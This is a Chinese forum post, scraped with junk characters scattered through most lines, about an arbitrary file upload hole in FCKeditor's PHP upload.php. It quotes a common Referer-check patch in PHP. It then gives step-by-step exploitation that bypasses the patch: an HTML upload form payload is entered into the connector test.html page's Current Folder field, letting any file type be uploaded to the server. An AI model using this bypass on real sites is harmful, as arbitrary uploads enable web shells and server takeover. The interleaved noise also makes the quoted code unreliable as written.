漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
! r& ?& i: A+ E3 v0 e' P网上给出的修复方案是
: B$ ?6 U/ H' F+ k3 L+ Z修复方法,删除FCK编辑器用其他的编辑器
9 [0 a3 a7 E7 h! ?. A或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件/ n+ Q, j+ K; f6 }/ x% C
在
* M+ J$ \( `( B3 M& Yrequire(‘config.php’); p! ~5 E$ f6 l9 `
require(‘util.php’);
! N l+ b0 e+ B V, T/ P- r的下面添加以下代码—————————–
- k1 y) N. H+ C) {! ]6 }//防止外部提交
" K' e2 a! R2 S9 s7 t+ z3 Zfunction outsidepost()! d' }" A' t9 g3 m) V. j
{% n; z% R" q/ r* m! w$ e% V: G
$servername=$_SERVER['SERVER_NAME'];5 _: n$ i# h: Z9 e5 c3 A
$sub_from=@$_SERVER['HTTP_REFERER'];" c8 j5 y( r& c
$sub_len=strlen($servername);# i, c5 y2 f6 f/ j2 x) q+ l0 K, ~
$checkfrom=substr($sub_from,7,$sub_len);
, B- j2 x! l$ V, l% |: b9 Xif($checkfrom!=$servername){1 F8 J, W# q' l
echo(“you don’t outsidepost!”);5 q z' `( u$ }7 H" O9 E; X: w
exit;; l2 }: p* L' P f
}
2 B6 `; y* q5 q C8 z# Y: Q, i}8 \/ \' ?; Z' y! c. t7 k, P
outsidepost();
; ?+ g+ \ }6 a防止外部提交,但是没有防止内部提交,' a2 S. T2 k; i4 M6 }. l) |# W( f
利用方法:4 X# X# W# X6 n& `- e
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
2 }1 w$ S# m! R! o2,在Current Folder 框输入9 o. d: t9 L A; p7 m# [
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>$ }; `) }( m- o0 J$ Y7 U4 {
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
: y6 H: F( a6 ]2 G% q, Y( n4 RPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |